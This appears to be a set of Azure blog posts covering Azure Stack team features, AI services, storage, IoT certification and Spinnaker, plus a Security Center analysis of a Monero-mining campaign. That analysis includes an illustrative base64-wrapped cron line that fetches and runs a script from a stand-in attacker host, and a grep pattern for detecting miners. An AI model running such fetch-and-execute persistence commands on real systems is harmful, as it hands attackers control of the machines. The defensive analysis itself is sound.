Azure Stack IaaS – part seven

It takes a team

Most apps are delivered by a team. When your team delivers an app through virtual machines (VMs), it is important to coordinate efforts. Born in the cloud to serve teams from all over the world, Azure and Azure Stack have some handy capabilities to help you coordinate VM operations across your team.

Identity and single sign-on

The easiest identity to remember is the one you use every day to sign in to your corporate network and check your email. If you are using Azure Active Directory, or your own Active Directory, your login to Azure Stack will be the same. This is something your admin sets up when Azure Stack is deployed, so you don’t have to learn and remember different credentials.

Learn more about integrating Azure Stack with Azure Active Directory and Active Directory Federation Services (ADFS).

Role-based access control

In the virtualization days, my team typically coordinated operations by sharing credentials to VMs and the management tools. Azure Resource Manager includes a robust role-based access control (RBAC) system that not only lets you identify who can access the system, but also lets you assign people to roles and set a scope of control that defines which actions they can perform on which resources.
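As a concrete sketch of scoped role assignment (the sign-in name, role, and resource group below are placeholders; this assumes the Azure CLI, which works against both Azure and Azure Stack endpoints):

```shell
# Grant a teammate the built-in "Virtual Machine Contributor" role,
# scoped to one resource group rather than the whole subscription.
az role assignment create \
  --assignee "teammate@contoso.com" \
  --role "Virtual Machine Contributor" \
  --resource-group "production-rg"

# Review who holds which role at that scope.
az role assignment list --resource-group "production-rg" --output table
```

These commands require a signed-in session against a real subscription, so they are shown here only to illustrate the assignee/role/scope model.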

More than just people in my organization

When you work in the cloud, you may need to collaborate with people from other organizations. And as more and more things become automated, you might have to give a process, not a person, access to a resource. Azure and Azure Stack have you covered. The image below shows a VM where I have granted access to three applications (service principals) and to a user from an external domain (a foreign principal).

Service principal

When an application needs access to deploy or configure VMs, or other resources in your Azure Stack, you can create a service principal, which is a credential for the application. You can then delegate only the necessary permissions to that service principal.

As an example, you may have a configuration management tool that inventories VMs in your subscription. In this scenario, you can create a service principal, grant the reader role to that service principal, and limit the configuration management tool to read-only access.
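That scenario can be sketched with the Azure CLI (the service principal name and subscription ID below are placeholders):

```shell
# Create a service principal for the inventory tool and grant it only
# the built-in Reader role across the subscription.
az ad sp create-for-rbac \
  --name "config-mgmt-inventory" \
  --role "Reader" \
  --scopes "/subscriptions/<subscription-id>"
```

The command prints an app ID and secret that the configuration management tool uses to authenticate; because the role is Reader, the tool can list and inspect VMs but cannot change them.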

Learn more about service principals in Azure Stack.

Foreign principal

A foreign principal is the identity of a user that is managed by another authority. For example, the team at Contoso.com might need to allow a contractor or a partner from Fabrikam.com to access a VM. In the virtualization days we would create a user account in our domain for that user, but that was a management headache. With Azure and Azure Stack, you can let users sign in with their own corporate credentials to access your VMs.

Learn how to enable multi-tenancy in Azure Stack.

Activity logs

When your VMs run around the clock, you will have team members working at all hours. Fortunately, Azure and Azure Stack include an activity log that allows you to track every change made to a VM and who initiated the action.
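For example, a sketch with the Azure CLI (the resource group name is a placeholder):

```shell
# Show the last seven days of activity for one resource group:
# when each operation happened, who initiated it, and what it was.
az monitor activity-log list \
  --resource-group "production-rg" \
  --offset 7d \
  --query "[].{Time:eventTimestamp, Caller:caller, Operation:operationName.value}" \
  --output table
```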

Learn more about Azure Activity Logs.

Locks

Sometimes people make mistakes, like deleting a production VM. A nice feature you will find in Azure and Azure Stack is the “lock.” A lock can be used to prevent changes to, or deletion of, a VM or any other resource. Any attempted change fails with an error message until someone removes the lock.
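A sketch of creating such a lock with the Azure CLI (the names below are placeholders):

```shell
# Prevent accidental deletion of a production VM.
az lock create \
  --name "do-not-delete" \
  --lock-type CanNotDelete \
  --resource-group "production-rg" \
  --resource-name "prod-vm-01" \
  --resource-type "Microsoft.Compute/virtualMachines"
```

With the lock in place, a delete attempt returns an error; removing the lock (az lock delete with the same identifiers) restores normal behavior.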

Learn more about locking VMs and other Azure resources.

Tags

The best place to store additional data about your VM is in the tool you use to manage it. Azure and Azure Stack give you the ability to attach extra information to your VM through the Tags feature. You can use tags to help your team keep track of the deployment environment, support contacts, cost center, or anything else important. You can even search for these tags in the portal to find the right resources quickly.
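A sketch with the Azure CLI (tag names and values are placeholders; note that az resource tag replaces the resource’s existing tag set):

```shell
# Tag a VM with its environment, cost center, and support contact.
az resource tag \
  --tags environment=production costCenter=CC1234 support=ops@contoso.com \
  --resource-group "production-rg" \
  --name "prod-vm-01" \
  --resource-type "Microsoft.Compute/virtualMachines"

# Later, find every resource that carries a given tag.
az resource list --tag environment=production --output table
```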

Learn more about tagging VMs and other Azure resources.

Work as a team, not individuals

The team features in Azure and Azure Stack allow your team to elevate its game and deliver the best virtual machine operations. Managing an Infrastructure-as-a-Service (IaaS) VM is more than stop, start, and log in. The Azure platform powering Azure Stack IaaS lets you organize, delegate, and track your team’s operations so you can deliver a better experience to your users.

In this blog series

We hope you come back to read future posts in this blog series. Here are some of our past and upcoming topics:

Azure Stack at its core is an Infrastructure-as-a-Service (IaaS) platform
Start with what you already have
Protect your stuff
Pay for what you use
Fundamentals of IaaS
Do it yourself
If you do it often, automate it
Build on the success of others
Journey to PaaS

Source: Azure

Azure AI does that?

Five examples of how Azure AI is driving innovation

Whether you’re just starting off in tech, building, managing, or deploying apps, gathering and analyzing data, or solving global issues, anyone can benefit from using cloud technology. Below we’ve gathered five cool examples of innovative artificial intelligence (AI) to showcase how you can be a catalyst for real change.

Facial recognition

You know that old box of photos you have sitting in the attic collecting cobwebs, the one with those beautifully embarrassing childhood photos half-covered by a misplaced thumb? How grateful would your family be if you could bring those back to life digitally, right at your fingertips? Manually scanning and downloading photos to all your devices would be a huge pain. And if those photos don’t have dates or the names of the people in them written on the back, forget it! But with AI algorithms, cognitive services, and facial recognition processes, organizing these photos into groups is super simple.

By utilizing Azure’s Face API, facial recognition algorithms can quickly and accurately detect, verify, identify, and analyze faces. They provide facial matching, facial attributes, and characteristic analysis in order to organize people and facial definitions into groups of similar faces.
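As a hedged sketch of calling the Face API over REST (the region placeholder, key variable, and image URL below are stand-ins, not real values):

```shell
# Detect faces in a photo by URL and ask for a couple of attributes.
# Replace <region> with your resource's region and set FACE_API_KEY first.
curl -s -X POST \
  "https://<region>.api.cognitive.microsoft.com/face/v1.0/detect?returnFaceAttributes=age,emotion" \
  -H "Ocp-Apim-Subscription-Key: $FACE_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"url": "https://example.com/old-family-photo.jpg"}'
```

The response is a JSON array with one entry per detected face, which grouping logic can then cluster by similarity.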

Handwriting analysis

Already spent hours manually sorting through those old photos? Not to worry, another helpful tool in the Computer Vision API is the ability to take the papers and handwritten notes you’ve compiled throughout your last project and create a cohesive document. No longer will you need to decipher those scribbles from your teammates and wonder whether that obscure symbol is a four or a “u.”

With Computer Vision API’s Recognizing Handwritten Text interface, you can conveniently take photos of handwritten notes, forms, whiteboards, sticky notes, that napkin you found, and anything in between. Rather than manually transcribing them, you can turn these documents into digital notes that are easy to comb through with a simple search. The interface can detect, extract, and digitally reproduce any type of handwriting—even Medieval Klingon! Imagine all the time and paper you will save!

Text analysis

A close cousin of the Handwriting API, the Text Analytics API allows for some pretty neat text analysis as well. Search through hundreds of documents, comb through customer reviews, tweets, and comments, and automatically flag posts for positive or negative sentiment by inputting just a few parameters. The API can also detect up to 120 different languages and disambiguate terms, for example whether “times” refers to The New York Times or Times Square. Pretty cool, right?

Translate languages

Speaking of detecting different languages, the Translator Text API lets you communicate with colleagues from all over the map better than ever before. Start typing “Hello, it’s nice to meet you” into your app, and the API can translate your entire conversation with your colleagues.

The Translator Text API can show text in different alphabets, translate Chinese characters to PinYin, display any of the supported transliteration languages in the Latin alphabet, and even show words written in the Latin alphabet in non-Latin characters such as Japanese, Hindi, or Arabic, all with some simple code. The API can be integrated into your apps, websites, tools, and solutions and allows you to add multi-language user experiences in more than 60 languages. This API is used by companies, like eBay, worldwide for website localization, e-commerce, customer support, messaging applications, bots, and more to provide quick and automatic translations for all their worldly customers.
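A minimal sketch of the REST call (the key variable is a placeholder; some accounts also require a region header):

```shell
# Translate one sentence into Japanese and Hindi in a single request.
curl -s -X POST \
  "https://api.cognitive.microsofttranslator.com/translate?api-version=3.0&to=ja&to=hi" \
  -H "Ocp-Apim-Subscription-Key: $TRANSLATOR_KEY" \
  -H "Content-Type: application/json" \
  -d '[{"Text": "Hello, nice to meet you"}]'
```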

Translator Text can also translate languages in real time through video or audio input, so you can seamlessly communicate with colleagues around the world via video chat. It even converts video to written text, which makes content accessible for people who are hearing- or visually impaired.

AI for Good

While all these services are great for automating business and personal projects, they can be used for much more. Last fall, Microsoft announced AI for Humanitarian Action: a new $40 million, five-year program that uses the power of AI to help the world recover from disasters, address the needs of children, protect refugees and displaced people, and promote respect for human rights. Part of this initiative is the AI for Good Suite, a five-year commitment to solve society’s biggest challenges using AI fundamentals.

One of those challenges is being addressed by long-time Microsoft partner Operation Smile, a nonprofit dedicated to repairing cleft lips and palates across the globe. Through the use of machine-vision AI and facial modeling, surgeons can compare pre- and post-surgery outcomes, rank the optimal repairs, and provide that data back to Operation Smile. From there, the organization can identify its top-performing surgeons and enable them to teach others how to improve their cleft repair techniques through videos that can be accessed around the globe.

Operation Smile is supercharging their doctors’ talents with technology to increase quality of life throughout the world. By utilizing AI, Operation Smile can help more children than ever before!

With AI, the sky is the limit. And who knows—you just might discover the next best innovation in AI technology.

Learn more

Learn more about what you can do with Cognitive Services

Get certified as an Azure AI Engineer
Source: Azure

Azure Security Center exposes crypto miner campaign

Azure Security Center discovered a new cryptocurrency mining operation targeting Azure customer resources.
The operation takes advantage of an old version of a well-known open-source CMS with a known remote code execution (RCE) vulnerability (CVE-2018-7600) as the entry point. After establishing persistence with the CRON utility, it mines the Monero cryptocurrency using a newly compiled binary of the open-source XMRig mining tool.

Azure Security Center (ASC) spotted the attack in real-time, and alerted the affected customer with the following alerts:

Suspicious file download – Possible malicious file download using wget detected
Suspicious CRON job – Possible suspicious scheduling tasks access detected
Suspicious activity – ASC detected periodic file downloads and execution from the suspicious source
Process executed from suspicious location

The entry point

Following the traces the attacker left behind, we were able to track the entry point of this malware and conclude that it originated from a remote code execution vulnerability in a well-known open-source CMS, CVE-2018-7600.

This vulnerability exists in older versions of the CMS and is estimated to impact a large number of websites running out-of-date versions. Its cause is insufficient input validation within an API call.

The first suspicious command line we noticed on the affected Linux machines was:

Decoding the base64 part of the command line reveals logic that periodically downloads and executes a bash script file using the CRON utility:

The URL path also includes a reference to the CMS name, another indication of the entry point (and of a sloppy attacker).
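The actual command line appeared only in the original screenshots, but the decoding step can be reproduced with an illustrative stand-in payload (this is not the attacker’s real script URL or command):

```shell
# Build an example base64-wrapped "install a cron job" payload, then
# decode it the way an analyst would when triaging the command line.
payload='(crontab -l; echo "* * * * * curl -s http://attacker.example/x.sh | bash") | crontab -'
encoded=$(printf '%s' "$payload" | base64 | tr -d '\n')

# Seeing only the encoded blob, base64 -d recovers the logic:
printf '%s' "$encoded" | base64 -d
```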

We also learned, from the telemetry collected from the affected machines, that this first command line executes in the “apache” user context, within the CMS’s working directory.

We examined the affected resources and discovered that all of them were running an unpatched version of the CMS, exposing them to a highly critical security risk that allows an attacker to run malicious code on the resource.

Malware analysis

The malware uses the CRON utility (the Unix job scheduler) for persistence by adding the following line to the CRON table file:

This results in the download and execution of a bash script file every minute, giving the attacker command and control through bash scripts.

The bash file (as we captured it at the time) downloads the binary file and executes it (as seen in the image above).
The binary checks whether the machine is already compromised, then uses HTTP 1.1 POST requests to download one of two further binary files, depending on the number of processors the machine has.

At first sight, the second binary seems harder to investigate, since it is clearly packed. Luckily, the attacker chose the UPX packer, which focuses on compression rather than obfuscation.

After unpacking the binary, we found a compilation of the open-source cryptocurrency miner XMRig, version 2.6.3. The miner was compiled with its configuration embedded and pulls its mining jobs from the attacker’s mining proxy server, so we were unable to estimate the attacker’s number of clients or earnings.

The big picture

By analyzing the behavior of several crypto miners, we have noticed two strong indicators of crypto-miner-driven attacks:

1. Killing competitors – Many crypto-attacks assume the machine is already compromised and try to kill other computing-power competitors. They do this by inspecting the process list, focusing on:

Process names – from popular open-source miners to lesser-known mining campaigns
Command line arguments such as known pool domains, crypto hash algorithms, mining protocol, etc.
CPU usage consumption

Another common method we identified is resetting the CRON tab, which in many cases is used as a persistence mechanism by other computing-power competitors.
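From the defender’s side, the same indicators can drive a simple process-list scan. A minimal sketch (the indicator list is illustrative, not taken from the actual campaign):

```shell
# Flag process-list lines that match common miner indicators:
# known miner names, the stratum pool protocol, or hash algorithm names.
find_miners() {
  grep -E 'xmrig|minerd|stratum\+tcp|cryptonight'
}

# Live usage would be: ps -eo pid,comm,args | find_miners
printf '101 bash bash\n202 xmrig xmrig -o stratum+tcp://pool:3333\n' | find_miners
```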

2. Mining pools – Crypto-mining jobs are managed by a mining pool, which gathers multiple clients to contribute and shares the revenue across them. Most attackers use public mining pools, which are simple to deploy and use, but once an attacker is exposed, the account might be blocked. Lately we have noticed an increasing number of cases where attackers run their own proxy mining server. This technique helps the attacker stay anonymous, both from detection by a security product on the host (such as Azure Security Center threat detection for Linux) and from detection by the public mining pool.

Conclusion and prevention

Preventing this attack is as easy as installing the latest security updates. An even better option might be using software as a service (SaaS) instead of maintaining a full web server and software environment.

Crypto-miner activity is usually easy to detect, since it consumes significant resources.
A cloud security solution such as Azure Security Center will continuously monitor the security of your machines, networks, and Azure services and alert you when unusual activity is detected.
Source: Azure

Leveraging AI and digital twins to transform manufacturing with Sight Machine

In the world of manufacturing, the Industrial Internet of Things (IIoT) has arrived, and that means data. A lot of data. Smart machines, equipped with sensors, add to the large quantity of data already generated by quality systems, MES, ERP, and other production systems. All this data is gathered in different formats and at different cadences, making it nearly impossible to use or to deliver business insights. Azure has mastered ingesting and storing manufacturing data with services such as Azure IoT Hub and Azure Data Lake, and now our partner Sight Machine has solved the other huge challenge: data variety. Sight Machine on Azure is a leading AI-enabled analytics platform that lets manufacturers normalize and contextualize plant-floor data in real time. The resulting digital twins allow them to find new insights, transform operations, and unlock new value.

Data in the pre-digital world

Manufacturers are aware of the untapped potential of production data. Global manufacturers have begun investing in on-premises solutions for capturing and storing factory floor data. But these pre-digital world methods have many disadvantages. They result in siloed data, uncontextualized data (raw machine data with no connection to actual production processes), and limited accessibility (engineers and specialists are required to access and manipulate the data). Most importantly, this data is only accessed in a reactive manner: it does not reflect real-time conditions. It can’t be used to address quality and productivity issues as they occur, or to predict conditions that might impact output.

Cloud-based manufacturing intelligence

Sight Machine’s Digital Manufacturing Platform, built on Azure, harnesses artificial intelligence, machine learning, and advanced analytics. It can continuously ingest and transform enormous quantities of production data into actionable insight, such as identifying vulnerabilities in quality and productivity throughout the enterprise. The approach is illustrated in this graphic.

Sight Machine’s platform leverages the IoT capabilities of Azure to ingest data from machines (PLCs and machine data). Azure IoT Hub and Azure Stream Analytics process the data in real time and store it in Azure Blob Storage. Sight Machine’s AI Data Pipeline dynamically integrates this data with other production sources, which can include ERP data from Dynamics AX and analyses generated by the Azure Machine Learning service and HDInsight, stored in Azure Data Lake. By combining all this data, Sight Machine creates a digital twin of the entire production process. Its analytics and visualization tools leverage this digital twin to deliver real-time information to the user. Integration with Azure Active Directory ensures the right engineers can access the right data and analysis tools.

Digital twins = one source of truth

Somewhat contrary to the notion of “twins,” digital twins result in one source of truth—at least in the world of data. The idea is simple: take data from disparate sources and locations—then combine the information in the cloud into digital representations of every machine, line, part, and process. Once a digital twin has been created, it can be stored, managed, analyzed, and presented.

Sight Machine creates digital twins that represent every manufacturing machine, line, facility, supplier, part, batch, and process. Sight Machine’s AI Data Pipeline automates the process of blending and transforming streaming data into fundamental units of analysis, purpose-built for manufacturing. This approach combines edge compute, cloud automation, and management with AI. The benefits include classification, mapping, data transformation, and unified data models that are configurable for every manufacturing environment.

Recommended next steps

To learn more about the company, go to the Sight Machine website. To try out the service, go to the Azure Marketplace listing and click Contact me.
Source: Azure

Introducing the App Service Migration Assistant for ASP.NET applications

This blog post was co-authored by Nitasha Verma, Principal Group Engineering Manager, Azure App Service.

In June 2018, we released the App Service Migration Assessment Tool, designed to help customers quickly and easily assess whether a site can be moved to Azure App Service by scanning an externally accessible (HTTP) endpoint. Today we’re pleased to announce the release of an updated version, the App Service Migration Assistant! The new version helps customers and partners move sites identified by the assessment tool by quickly and easily migrating ASP.NET sites to App Service.

The App Service Migration Assistant is designed to simplify your journey to the cloud through a free, simple, and fast solution for migrating ASP.NET applications from on-premises to the cloud. You can quickly:

Assess whether your app is a good candidate for migration by running a scan of its public URL.
Download the Migration Assistant to begin your migration.
Use the tool to run readiness checks and general assessment of your app’s configuration settings, then migrate your app or site to Azure App Service via the tool.

Keep reading to learn more about the tool or start your migration now.​

Getting started

Download the App Service Migration Assistant. This tool works with ASP.NET sites hosted on IIS 7.0 and above and will migrate site content and configuration to your Azure App Service subscription using either a new or existing App Service plan.

How the tool works

The Migration Assistant tool is a local agent that performs a detailed assessment and then walks you through the migration process. The tool performs readiness checks as well as a general assessment of the web app’s configuration settings.

Once the application has received a successful assessment, the tool will walk you through the process of authenticating with your Azure subscription and then prompt you to provide details on the target account and App Service plan along with other configuration details for the newly migrated site.

The Migration Assistant tool will then move your site to the target App Service plan while also configuring Hybrid Connections, should that option be selected.

Database migration and Hybrid Connections

Our Migration Assistant is designed to migrate the web application and associated configurations, but it does not migrate the database. There are two options for your database:

Use the SQL Migration Tool
Leave your database on-premises and connect to it from the cloud using Hybrid Connections

When used with App Service, Hybrid Connections allows you to securely access application resources in other networks – in this case an on-premises SQL database. The migration tool configures and sets up Hybrid Connections for you, allowing you to migrate your site while keeping your database on-premises to be migrated at your leisure.

Supported configurations

The tool should migrate most modern ASP.NET applications, but some configurations are not supported. These include:

IIS version less than 7.0
Dependence on ISAPI filters
Dependence on ISAPI extensions
Bindings that are not HTTP or HTTPS
Endpoints that are not port 80 for HTTP, or port 443 for HTTPS
Authentication schemes other than anonymous
Dependencies on applicationhost.config settings made with a location tag
Applications that use more than one application pool
Use of an application pool that uses a custom account
URL Rewrite rules that depend on global settings
Web farms – specifically shared configuration

You can find more details on what the tool supports, as well as workarounds for some unsupported sites, on the documentation page.

You can also find more details on App Service migrations on the App Service Migration checklist.

What’s next

We plan to continue adding functionality to the tool in the coming months, with the most immediate priorities being additional ASP.NET scenarios and support for additional web frameworks such as Java and PHP.

If you have any feedback on the tool or would like to suggest improvements, please submit your feature requests on our GitHub page.
Source: Azure

Hybrid storage performance comes to Azure

When it comes to adding a performance tier between compute and file storage, Avere Systems has led the way with its high-performance caching appliance known as the Avere FXT Edge Filer. This week at NAB, attendees will get a first look at the new Azure FXT Edge Filer, now with even more performance, memory, and SSD capacity, plus support for Azure Blob. Since Microsoft’s acquisition of Avere last March, we’ve been working to provide an exciting combination of performance and efficiency to support hybrid storage architectures with the Avere appliance technology.

Linux performance over NFS

Microsoft is committed to meeting our customers where we’re needed. The launch of the new Azure FXT Edge Filer is yet another example of this as we deliver high-throughput and low-latency NFS to applications running on Linux compute farms. The Azure FXT Edge Filer solves latency issues between Blob storage and on-premises computing with built-in translation from NFS to Blob. It sits at the edge of your hybrid storage environment closest to on-premises compute, caching the active data to reduce bottlenecks. Let’s look at common applications:

Active Archives in Azure Blob – When Azure Blob is a target storage location for aging, but not yet cold data, the Azure FXT Edge Filer accelerates access to files by creating an on-premises cache of active data.

WAN Caching – Latency across wide area networks (WANs) can slow productivity. The Azure FXT Edge Filer caches active data closest to the users and hides that latency as they reach for data stored in data centers or colos. Remote office engineers, artists, and other power users achieve fast access to files they need, and meanwhile backup, mirroring, and other data protection activities run seamlessly in the core data center.

NAS Optimization – Many high-performance computing environments have large NetApp or Dell EMC Isilon network-attached storage (NAS) arrays. When demand is at its peak, these storage systems can become bottlenecks. The Azure FXT Edge Filer optimizes these NAS systems by caching data closest to the compute, separating performance from capacity and better delivering both.

When datasets are large, hybrid file-storage caching provides performance and flexibility that are needed to keep core operations productive.

Azure FXT Edge Filer model specifications

We are currently previewing the FXT 6600 model at customer sites, with a second FXT 6400 model becoming available with general availability. The FXT 6600 is an impressive top-end model with 40 percent more read performance and double the memory of the FXT 5850. The FXT 6400 is a great mid-range model for customers who don’t need as much memory and SSD capacity or are looking to upgrade FXT 5600 and FXT 5400 models at an affordable price.

                        Azure FXT Edge Filer 6600            Azure FXT Edge Filer 6400
Positioning             Highest performance, largest cache   High-performance, large cache
DRAM (per node)         1536 GB                              768 GB
SSD (per node)          25.6 TB                              12.8 TB
Network ports           6x25/10Gb + 2x1Gb                    6x25/10Gb + 2x1Gb
Minimum cluster size    3 nodes                              3 nodes
Encryption              AES-256                              AES-256

Key features

Scalable to 24 FXT server nodes as demand grows
High-performance DRAM/memory for faster access to active data and large SSD cache sizes to support big data workloads
Single mountpoint provides simplified management across heterogeneous storage
Hybrid architecture – NFSv3, SMB2 to clients and applications; support for NetApp, Dell EMC Isilon, Azure Blob, and S3 storage

The Azure FXT Edge Filer is a combination of hardware provided by Dell EMC and software provided by Microsoft. For ease, a complete solution will be delivered to customers as a software-plus-hardware appliance through a system integrator. If you are interested in learning more about adding the Azure FXT Edge Filer to your on-premises infrastructure or about upgrading existing Avere hardware, you can reach out to the team now. Otherwise, watch for updates on the Azure FXT Edge Filer homepage.

Azure FXT Edge Filer for render farms

High-performance file access for render farms and artists is key to meeting important deadlines and building efficiencies into post-production pipelines. At NAB 2019 in Las Vegas, visit the Microsoft Azure booth #SL6716 to learn more about the new Azure FXT Edge Filer for rendering. You’ll find technology experts, presentations, and support materials to help you render faster with Azure.

Resources

Visit the Azure FXT Edge Filer homepage. 
Get started by reading the Azure FXT documentation.
To learn more about Microsoft’s acquisition of Avere Systems, refer to the blog post, “Microsoft to acquire Avere Systems, accelerating high-performance computing innovation for media and entertainment industry and beyond.”
Learn more about Avere vFXT for Azure.

Source: Azure

Expanding Azure IoT certification service to support Azure IoT Edge devices

In December 2018, Microsoft launched the Azure IoT certification service, a web-based test automation workflow to streamline the certification process through self-serve tools. Azure IoT certification service (AICS) was designed to reduce the operational processes and engineering costs for hardware manufacturers to get their devices certified for Azure Certified for IoT program and be showcased on the Azure IoT device catalog.

The initial version of AICS focused on IoT device certification. Today, we are expanding the service to also support Azure IoT Edge device certification. An Azure IoT Edge device comprises three key components: IoT Edge modules, the IoT Edge runtime, and a cloud-based interface. Learn more about these three components in this blog explaining IoT Edge.

Certifying a device as an Azure IoT Edge device means that the certification program validates the functionality of the three key components described above. The program also ensures that the identity of a device is protected through validation of its security components. You can review the specific technical requirements for Azure IoT Edge device certification.

This expansion of AICS capabilities builds on the related expansion of the Azure Certified for IoT program to support Azure IoT Edge devices, announced in June 2018. Since then, the certified Azure IoT Edge device ecosystem has grown rapidly, with additional operating system support such as Windows IoT and an Edge module ecosystem that allows any partner to build containerized apps and deploy modules to a range of Azure IoT Edge devices. You can also see all the certified Azure IoT Edge devices here.

With the web-based test workflow now updated to also certify Edge devices, AICS not only helps improve the overall quality of IoT deployments but also simplifies the certification process for device manufacturers. From now on, all device manufacturers are required to run AICS to complete the certification process. To learn more about AICS and see a demo of it in action, please refer to this episode of the IoT Show on Channel 9.

Ecosystem partners have endorsed this strategy and approach as well. One partner who recently used the tool provided this comment:

“Azure IoT certification service (AICS) simplifies the validation process for Azure IoT Edge device certification and increases our quality and consistency for Azure IoT Edge devices.”

–Tomoyasu Suzuki, President of Plat'Home Co., Ltd

Azure IoT Edge flow within AICS

The workflow and user experience for Azure IoT Edge devices are similar to the IoT device certification workflow. You will need to select the device’s OS, prepare your device to register with the specified IoT Hub instance, and then start the run. Step-by-step instructions are provided in the certification documentation.

There are three key differences between the Azure IoT Edge flow and the IoT device certification flow:

“Edge certified” checkbox needs to be checked to invoke the AICS workflow for Azure IoT Edge

To start AICS for Azure IoT Edge devices, first ensure that you select the “Edge Certified” checkbox under the Azure IoT Edge section on the first page of the device registration process when submitting a device for certification.

Automated tests are different. The AICS workflow for IoT devices validates IoT Hub primitives such as device-to-cloud, cloud-to-device, direct methods, and device twin properties. The AICS workflow for IoT Edge devices validates the presence of the edgeAgent module on the device, and also tests that a sample Edge module is successfully deployed to the device.
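
The Edge device check described above can be sketched in a few lines. This is an illustrative model only, assuming a device twin that reports module names and statuses; the function name, the `SimulatedTemperatureSensor` sample module name, and the pass/fail shape are illustrative, not the actual AICS implementation.

```python
# Illustrative sketch (not the actual AICS implementation): the Edge
# certification flow conceptually checks that the edgeAgent module is
# present and that a sample Edge module deployed successfully.

def validate_edge_device(reported_modules):
    """Return (passed, reasons) for a hypothetical Edge device check.

    `reported_modules` maps module names to their reported runtime
    status, roughly as a device twin might report them.
    """
    reasons = []
    if "edgeAgent" not in reported_modules:
        reasons.append("edgeAgent module not found on device")
    # Assumed sample module name for illustration only.
    if reported_modules.get("SimulatedTemperatureSensor") != "running":
        reasons.append("sample Edge module is not running")
    return (not reasons, reasons)

ok, why = validate_edge_device(
    {"edgeAgent": "running", "edgeHub": "running",
     "SimulatedTemperatureSensor": "running"})
print(ok)  # True
```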

To learn more about this process please see our blog on streamlined IoT device certification.

Upon submission, AICS will notify the Microsoft team, which will follow up with you and provide guidance on packaging and shipping the physical device to Microsoft. This step is not necessary for the IoT device certification process. The confirmation dialog is shown below.

AICS makes the certification process easy and intuitive. We encourage every device manufacturer to submit devices for certification.

Next steps

Go to Partner Dashboard to start your submission.

If you have any questions, please contact Azure Certified for IoT.
Quelle: Azure

Spinnaker continuous delivery platform now with support for Azure

Spinnaker is an open source, multi-cloud continuous delivery platform for releasing software changes with high velocity and confidence. A growing number of enterprises have chosen it as the open source continuous deployment platform for modernizing their application deployments, and most of these enterprises deploy applications to multiple clouds. One of Spinnaker’s key features is the ability to deploy applications to different clouds using best practices and proven deployment strategies.

Until now, customers who had standardized on Spinnaker had to use custom or different tooling to deploy their applications to Azure.

With this blog post and the recent release of Spinnaker (1.13), we are excited to announce that Microsoft has worked with the core Spinnaker team to ensure Azure deployments are integrated into Spinnaker!

These integrations strengthen our existing open source CI/CD pipeline toolchain and allow customers who have taken a dependency on Spinnaker to deploy to Azure with it as well.

Initial release (1.13)

In our initial release we have enabled a core Spinnaker scenario for deploying immutable VM images: the Build, Bake, Deploy scenario.

As the scenario name suggests, there are three primary stages in the Spinnaker pipeline.

Build (labeled “Configuration” above): The build stage happens outside of Spinnaker and is used as a trigger for the following stages. It can be a Jenkins job, a Travis job, or a webhook, and it generates a package that will be used to create a VM image.
Bake: This stage uses the package from the previous step to create an Azure managed VM image.
Deploy: Finally, the deploy stage deploys one or more Virtual Machine Scale Sets using the managed VM image from the previous step. This can be done using one of the built-in strategies like Highlander or Red/Black.
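
The three stages above can be sketched as a minimal pipeline that threads each stage’s artifact into the next. This is a conceptual illustration only, assuming simple string artifacts; it is not Spinnaker’s actual pipeline data model or API.

```python
# Conceptual sketch of the Build -> Bake -> Deploy flow described above.
# Artifact names are illustrative placeholders, not Spinnaker's model.

def run_pipeline(app_name):
    """Walk the three stages, passing each stage's output to the next."""
    # Build: an external CI job (Jenkins, Travis, or a webhook)
    # produces a package that triggers the rest of the pipeline.
    package = f"{app_name}.deb"
    # Bake: the package is turned into an Azure managed VM image.
    image = f"managed-image-from-{package}"
    # Deploy: a Virtual Machine Scale Set is created from the baked
    # image, using a strategy such as Highlander or Red/Black.
    scale_set = f"vmss-running-{image}"
    return [package, image, scale_set]

print(run_pipeline("myapp"))
```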

Since Spinnaker is used to deploy to multiple clouds, it has created some abstractions for common infrastructure components. In this release these abstractions map to Azure infrastructure as follows:

Server Group: Maps to an Azure Virtual Machine Scale Set
Load balancer: Maps to an Azure Application Gateway
Firewall: Maps to an Azure Network Security Group
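
The abstraction-to-resource mapping above can be captured as a simple lookup table, handy when translating Spinnaker terminology into Azure resources. The table contents come straight from the list above; the function and constant names are illustrative.

```python
# The Spinnaker-to-Azure mapping from the list above, as a lookup table.
SPINNAKER_TO_AZURE = {
    "server group": "Virtual Machine Scale Set",
    "load balancer": "Application Gateway",
    "firewall": "Network Security Group",
}

def azure_resource_for(abstraction):
    """Return the Azure resource behind a Spinnaker abstraction."""
    return SPINNAKER_TO_AZURE[abstraction.lower()]

print(azure_resource_for("Firewall"))  # Network Security Group
```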

What’s next?

We are excited to be accepted as part of the Spinnaker open source community and will continue to invest in Spinnaker to enable other scenarios such as container-based Azure Kubernetes Service (AKS) deployments, improve performance, and add flexibility to the infrastructure abstractions. We will publish our roadmap, so keep an eye out and let us know what you think.

If you are interested in learning more about Spinnaker, or if it is already an important component of your DevOps toolchain and you would like to help us make the integration with Azure great, please reach out to us. You can connect directly with us in any of the following venues:

Join the conversation on the Azure channel in Spinnaker Slack.
Create issues and/or contribute on GitHub.

Quelle: Azure

Device template library in IoT Central

With the new addition of a device template library to our Device Templates page, we are making it easier than ever to onboard and model your devices. Now, when you create a new template, you can either build one from scratch or quickly select from a library of existing device templates. Today you can choose from our MXChip, Raspberry Pi, or Windows 10 IoT Core templates. We will keep improving this library by adding more device templates that provide customer value.

The addition of the device template library helps to streamline the device modeling workflow. It saves time as you can pre-populate a model with existing details. This now opens the door for more manufacturers to create standard definitions for their devices or smart products which we’ll continue to include in this growing template library.

To get started with selecting a device template, select the Device Templates tab and click the “+ New” button. This will bring you to our library page where you can choose which template you’d like to get quickly started with. You can also choose the Custom option if you would like to begin modeling your device template from scratch.

Once you select a template, simply give it a name and click “Create” to add the template to your application. We will automatically create a simulated device so you can view simulated data coming into this new template. Once your template has been created, you can visit the “Device Explorer” page to connect other real or simulated devices to this template.
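
The create-from-library flow above can be sketched as a small helper: pick a library template (or “Custom”), name it, and get a template with its auto-created simulated device back. All names and structures here are illustrative placeholders, not the IoT Central API.

```python
# Illustrative sketch of the template-library flow (not IoT Central's
# actual API): choose a base template, name it, get a simulated device.
LIBRARY = {"MXChip", "Raspberry Pi", "Windows 10 IoT Core", "Custom"}

def create_template(base, name):
    """Create a hypothetical device template from a library entry."""
    if base not in LIBRARY:
        raise ValueError(f"unknown library template: {base}")
    # IoT Central automatically adds a simulated device to a new
    # template; the naming scheme below is made up for illustration.
    simulated_device = f"{name}-simulated-1"
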